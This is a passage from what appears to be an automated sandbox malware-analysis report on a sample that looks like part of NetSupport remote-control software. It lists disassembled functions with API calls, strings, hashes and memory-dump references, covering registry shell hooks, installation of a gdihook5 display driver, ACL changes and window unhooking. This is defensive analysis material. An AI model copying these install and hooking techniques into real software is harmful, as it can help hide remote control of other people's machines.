                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCC89
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCCB5
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCCE2
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCD11
                                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 005BCD23
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005BCD60
                                                                                          • GetProcAddress.KERNEL32(00000000,SetSecurityInfo), ref: 005BCD72
                                                                                            • Part of subcall function 005BC920: LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 005BC966
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCDA1
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005BCDAC
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCDC3
                                                                                          • LocalFree.KERNEL32(00000000), ref: 005BCDCE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ErrorLast$FreeLocal$DescriptorLibrarySecurity$AccountAllocDaclInitializeLoadLookup
                                                                                          • String ID: Advapi32.dll$BuildExplicitAccessWithNameW$ConvertStringSidToSidW$S-1-5-18$S-1-5-32-544$S-1-5-32-545$SetEntriesInAclW$SetSecurityInfo
                                                                                          • API String ID: 1399026231-2023978906
                                                                                          • Opcode ID: 22da7e83172c79aa9c8c4ed5160aebc326d11967e5b91b76e9baa7e432798913
                                                                                          • Instruction ID: 6f4029afbca5c94fb90f9885d2cec24ae732ed10d75cdb29f32a124cd384f22d
                                                                                          • Opcode Fuzzy Hash: 22da7e83172c79aa9c8c4ed5160aebc326d11967e5b91b76e9baa7e432798913
                                                                                          • Instruction Fuzzy Hash: 9DC17E71D402289BDB21DB58DC99FDDBFB9FB44700F18859AF599A2180DB705E80CFA4
                                                                                          Function 005C41D0 Relevance: 66.4, APIs: 44, Instructions: 414COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Pixel$Line$Move$Object$Select$CreateDelete
                                                                                          • String ID:
                                                                                          • API String ID: 3848591802-0
                                                                                          • Opcode ID: 6faebeb23e8df77d8b8596b463fe9f99dab5a67303f15064f6bb41dd7d84d695
                                                                                          • Instruction ID: 1ba6532753cd142a912e0a842477baef687bc8c2639e60ce681ed78c914b7d97
                                                                                          • Opcode Fuzzy Hash: 6faebeb23e8df77d8b8596b463fe9f99dab5a67303f15064f6bb41dd7d84d695
                                                                                          • Instruction Fuzzy Hash: F2D1B1B4610601AFE728DF69CD99D7BB7FEEBC9B10B10C60DF99693744C634AD418A20
                                                                                          Function 005AEF40 Relevance: 54.6, APIs: 13, Strings: 18, Instructions: 361COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005AEFE9
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF0CD
                                                                                            • Part of subcall function 005AFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 005AFF66
                                                                                            • Part of subcall function 005AFF40: GetProcAddress.KERNEL32(00000000), ref: 005AFF6D
                                                                                            • Part of subcall function 005AFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 005AFF83
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AddressHandleModuleProcProcessSystem
                                                                                          • String ID: Try again after removing the 'Block Unsigned Driver Policy'$DISPLAY$InstallGdihook5 ret %d$New mirror installation, e=%d$Unloadable mirror detected - update on reboot$Updategdihook5 err=x%x$Updategdihook5 ok$\gdihook5.dll$copy %s to %s failed$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$pci_gdihook5_hwid$rename %s to %s on reboot failed$rename %s to %s on reboot ok$using .inf=%s
                                                                                          • API String ID: 814484115-2657261969
                                                                                          • Opcode ID: ebf4305ccc5710dd053d128e81efe0f02814aa5947111d0e54959256df45e9b6
                                                                                          • Instruction ID: dfec77d32765c306fd8685dfe27a223c7c77b762fa4726d5118cc782a753e4c4
                                                                                          • Opcode Fuzzy Hash: ebf4305ccc5710dd053d128e81efe0f02814aa5947111d0e54959256df45e9b6
                                                                                          • Instruction Fuzzy Hash: B6D1B5B5D002199BEB209FA4CC95FEEBBB5FF45304F1486B6E50A92181EB705E84CF61
                                                                                          Function 005C4D70 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 291COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005C4DED
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C4E57
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 005C4E83
                                                                                          • wsprintfW.USER32 ref: 005C4E92
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?), ref: 005C4EB8
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?), ref: 005C4EE4
                                                                                          • wsprintfW.USER32 ref: 005C4F2C
                                                                                          • wsprintfW.USER32 ref: 005C4F39
                                                                                          • wsprintfW.USER32 ref: 005C4F47
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005C4F94
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 005C4FC0
                                                                                          • wsprintfW.USER32 ref: 005C4FD9
                                                                                          • wsprintfW.USER32 ref: 005C4FEE
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 005C5077
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?), ref: 005C50A3
                                                                                          • wsprintfW.USER32 ref: 005C50B9
                                                                                          • wsprintfW.USER32 ref: 005C50D2
                                                                                          • wsprintfW.USER32 ref: 005C50DF
                                                                                          • wsprintfW.USER32 ref: 005C50ED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$ByteCharMultiWide
                                                                                          • String ID: (%d.%02d.%d.%d)$ + %d bytes$%p $%s + %d bytes$, %s, Line %d$<unknown module>$<unknown symbol>
                                                                                          • API String ID: 760609171-3267890874
                                                                                          • Opcode ID: f89a520df9490b070152ab7ddb4c00846331d7c37ea5a0d9cdd8aaef2c4675b4
                                                                                          • Instruction ID: 3a1c0fd7b31adebb504ae876b501375204b843559223135eb781463df5b1f08a
                                                                                          • Opcode Fuzzy Hash: f89a520df9490b070152ab7ddb4c00846331d7c37ea5a0d9cdd8aaef2c4675b4
                                                                                          • Instruction Fuzzy Hash: 9BA16170A003296BDB25DB658C42FEAB7BDBF84704F144298B558A72C0DA71AF41CF94
                                                                                          Function 005D51E0 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 187registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • LoadStringW.USER32(00590000,00000421,?,00000080), ref: 005D5258
                                                                                          • wsprintfW.USER32 ref: 005D528C
                                                                                          • wsprintfW.USER32 ref: 005D52A9
                                                                                          • wsprintfW.USER32 ref: 005D52DC
                                                                                          • RegCreateKeyW.ADVAPI32(80000000,?,?), ref: 005D5308
                                                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 005D5348
                                                                                          • RegCreateKeyW.ADVAPI32(?,command,?), ref: 005D537F
                                                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 005D53BA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D53D8
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D53E5
                                                                                          • wsprintfW.USER32 ref: 005D5400
                                                                                          • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 005D5417
                                                                                          • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 005D543A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CloseCreateDeleteValue$LoadLocalStringTimewvsprintf
                                                                                          • String ID: "%spcinssui.exe" /ShowVideo "%%L"$$(b$%s=%s, err=%d$%s\command$%s\shell\show$8(b$Del %s, err=%d$Done InstallShowVideo.$H(b$InstallShowVideo %d$X(b$command$command=%s, err=%d
                                                                                          • API String ID: 4153008296-2667673329
                                                                                          • Opcode ID: 03338f9391203346b0d6fe0e3914de68c272ea4c770fb354b07da4016bec829d
                                                                                          • Instruction ID: 3befaf3778a45f26f13773ffab7c468e348d6514dc78251d4c8d79ab28f9498b
                                                                                          • Opcode Fuzzy Hash: 03338f9391203346b0d6fe0e3914de68c272ea4c770fb354b07da4016bec829d
                                                                                          • Instruction Fuzzy Hash: 0D61E9B5900619AFDB24DF54DC95FDB777AFF88300F04819AF50997240E6B19A98CFA0
                                                                                          Function 005B60C0 Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 224windowmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B60DE
                                                                                          • GetStockObject.GDI32(0000000F), ref: 005B60F2
                                                                                          • GetDC.USER32(00000000), ref: 005B6174
                                                                                          • SelectPalette.GDI32(00000000,?,00000000), ref: 005B6185
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B618B
                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 005B61A6
                                                                                          • SelectPalette.GDI32(00000000,?,00000001), ref: 005B61BA
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B61BD
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B61C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                          • String ID: (
                                                                                          • API String ID: 1969595663-3887548279
                                                                                          • Opcode ID: 62fe2caa3ee7be96286852c1d03d9342f5a1864c18018f973425a8571dc3eded
                                                                                          • Instruction ID: d645a23fd97e7b3387af7f855fb72b3711296ef5b7d99e8ab76365721b096092
                                                                                          • Opcode Fuzzy Hash: 62fe2caa3ee7be96286852c1d03d9342f5a1864c18018f973425a8571dc3eded
                                                                                          • Instruction Fuzzy Hash: A87182B1E00218AFDB10DFA5DC89BEEBBBAFF49711F148516F901E7250D774A9418BA0
                                                                                          Function 005ACB20 Relevance: 42.3, APIs: 17, Strings: 7, Instructions: 309synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 005ACBAC
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,?), ref: 005ACBCF
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005ACBDA
                                                                                          • ResetEvent.KERNEL32(?), ref: 005ACBEF
                                                                                          • ResetEvent.KERNEL32(?), ref: 005ACBF5
                                                                                          • SetEvent.KERNEL32(?), ref: 005ACBFB
                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 005ACC31
                                                                                          • SetEvent.KERNEL32(?), ref: 005ACC5D
                                                                                          • ResetEvent.KERNEL32(?), ref: 005ACC67
                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 005ACCC8
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 005ACD04
                                                                                          • wsprintfW.USER32 ref: 005ACD7A
                                                                                          • SetEvent.KERNEL32(FFFFCFC7), ref: 005ACDBA
                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 005ACE02
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$Wait$Reset$MultipleObjectObjectsProcessSingle$CloseCurrentHandleOpenwsprintf
                                                                                          • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                          • API String ID: 4210835752-3727536503
                                                                                          • Opcode ID: 45a5fbaeec159ef30c86313b77679e668ab9d64e14f132053ab238fe3e203d44
                                                                                          • Instruction ID: 24085f3ad8da46c6377f14058ead9779151d748e459174c3c939b81336e051f2
                                                                                          • Opcode Fuzzy Hash: 45a5fbaeec159ef30c86313b77679e668ab9d64e14f132053ab238fe3e203d44
                                                                                          • Instruction Fuzzy Hash: 95C14875A007049FD724DF25D894B9ABBE6BF88310F14C65AE94A87791CB70ED81CFA0
                                                                                          Function 005D8F20 Relevance: 42.3, APIs: 28, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowTextW.USER32(?,?,000000F0), ref: 005D8F4C
                                                                                          • wsprintfW.USER32 ref: 005D8F6D
                                                                                          • SetWindowTextW.USER32(?,?), ref: 005D8FB7
                                                                                          • GetDlgItemTextW.USER32(?,0000041C,?,000000F0), ref: 005D8FD5
                                                                                          • wsprintfW.USER32 ref: 005D8FEF
                                                                                          • SetDlgItemTextW.USER32(?,0000041C,?), ref: 005D903C
                                                                                          • GetDlgItemTextW.USER32(?,0000041D,?,000000F0), ref: 005D9054
                                                                                          • wsprintfW.USER32 ref: 005D9091
                                                                                          • SetDlgItemTextW.USER32(?,0000041D,?), ref: 005D90DE
                                                                                          • GetDlgItemTextW.USER32(?,0000041E,?,000000F0), ref: 005D9100
                                                                                          • wsprintfW.USER32 ref: 005D911B
                                                                                          • SetDlgItemTextW.USER32(?,0000041E,?), ref: 005D916C
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005D917D
                                                                                          • EnableWindow.USER32(00000000), ref: 005D9180
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005D918B
                                                                                          • ShowWindow.USER32(00000000), ref: 005D918E
                                                                                          • GetDlgItem.USER32(?,00000006), ref: 005D91B0
                                                                                          • EnableWindow.USER32(00000000), ref: 005D91B9
                                                                                          • GetDlgItem.USER32(?,00000006), ref: 005D91C0
                                                                                          • ShowWindow.USER32(00000000), ref: 005D91C9
                                                                                          • GetDlgItem.USER32(?,00000007), ref: 005D91D6
                                                                                          • EnableWindow.USER32(00000000), ref: 005D91D9
                                                                                          • GetDlgItem.USER32(?,00000007), ref: 005D91E6
                                                                                          • ShowWindow.USER32(00000000), ref: 005D91E9
                                                                                          • GetDlgItem.USER32(?,0000041E), ref: 005D91F9
                                                                                          • EnableWindow.USER32(00000000), ref: 005D91FC
                                                                                          • GetDlgItem.USER32(?,0000041E), ref: 005D920C
                                                                                          • ShowWindow.USER32(00000000), ref: 005D920F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Item$Window$Text$EnableShowwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1904402394-0
                                                                                          • Opcode ID: 807af698c0543ee8c96bbf9efa4ef29063bbdc499d661d99ad4216461db4c9c4
                                                                                          • Instruction ID: 46eb73346a17631188c1c54f8cd54a7037ddd0687da15292b49296d72018eb39
                                                                                          • Opcode Fuzzy Hash: 807af698c0543ee8c96bbf9efa4ef29063bbdc499d661d99ad4216461db4c9c4
                                                                                          • Instruction Fuzzy Hash: 2581D271E4021BAADB24DB64DD45FFB777EFB24710F0445A7E609A6280EA31EA44CB60
                                                                                          Function 005E08E8 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 138synchronizationsleeplibraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005E08FE
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000F), ref: 005E091A
                                                                                          • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 005E0934
                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 005E0941
                                                                                          • ShowWindow.USER32(?,00000000), ref: 005E0954
                                                                                          • ShowWindow.USER32(?,00000005), ref: 005E0959
                                                                                          • WaitForSingleObject.KERNEL32(?,00000032), ref: 005E096A
                                                                                          • ResetEvent.KERNEL32(?), ref: 005E0978
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 005E0993
                                                                                          • GetProcAddress.KERNEL32(?,MyUnhook), ref: 005E09C5
                                                                                          • GetDesktopWindow.USER32 ref: 005E09EC
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 005E0A00
                                                                                          • OpenProcess.KERNEL32(00000600,00000000,?), ref: 005E0A19
                                                                                          • OpenProcess.KERNEL32(00000200,00000000,?), ref: 005E0A2E
                                                                                          • GetPriorityClass.KERNEL32(00000000), ref: 005E0A37
                                                                                          • SetPriorityClass.KERNEL32(00000000,00000080), ref: 005E0A4C
                                                                                          • GetDesktopWindow.USER32 ref: 005E0A58
                                                                                          • SendMessageW.USER32(00000000), ref: 005E0A5F
                                                                                          • Sleep.KERNEL32(000000FA,80000002,Software\NetSupport Ltd\winsthooks,00020219), ref: 005E0AAC
                                                                                          • SetPriorityClass.KERNEL32(00000000,00000000), ref: 005E0AB8
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005E0ABF
                                                                                          • CloseHandle.KERNEL32(?), ref: 005E0ADD
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005E0AEA
                                                                                          • CloseHandle.KERNEL32(?), ref: 005E0AF3
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005E0B10
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599791
                                                                                            • Part of subcall function 00599770: GetWindowLongW.USER32(00000000,000000F0), ref: 005997A4
                                                                                            • Part of subcall function 00599770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 005997C2
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599839
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$CloseHandle$ClassFindObjectPriorityProcessSingleWait$DesktopLongOpenShow$AddressAttributeEventFreeLibraryMessageProcResetSendSleepThread
                                                                                          • String ID: MyUnhook$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s
                                                                                          • API String ID: 3586307839-2527058001
                                                                                          • Opcode ID: d1127cb8899f9f34775b17b02d7b917e9f080bd0def7c7da92fe7675c7322979
                                                                                          • Instruction ID: 5fcdbfde34e2e03c91b5de1f10d9bbe6163b8b86ce85c8f014c0428ad06cf42a
                                                                                          • Opcode Fuzzy Hash: d1127cb8899f9f34775b17b02d7b917e9f080bd0def7c7da92fe7675c7322979
                                                                                          • Instruction Fuzzy Hash: 16415770900769ABDB30ABA0DC88BEE3B79BF40704F08509AE645A31C3DA709DC4CF65
                                                                                          Function 005FACE3 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005F299E: EncodePointer.KERNEL32(00000000,005FAD09,00642898,00000314,00000000,?,?,?,?,?,005EF35C,00642898,Microsoft Visual C++ Runtime Library,00012010), ref: 005F29A0
                                                                                          • LoadLibraryW.KERNEL32(USER32.DLL,00642898,00000314,00000000), ref: 005FAD1E
                                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 005FAD3A
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD4B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 005FAD58
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD5B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 005FAD68
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD6B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 005FAD78
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD7B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 005FAD8C
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD8F
                                                                                          • DecodePointer.KERNEL32(00000000,00642898,00000314,00000000), ref: 005FADB1
                                                                                          • DecodePointer.KERNEL32 ref: 005FADBB
                                                                                          • DecodePointer.KERNEL32(?,00642898,00000314,00000000), ref: 005FADFA
                                                                                          • DecodePointer.KERNEL32(?), ref: 005FAE14
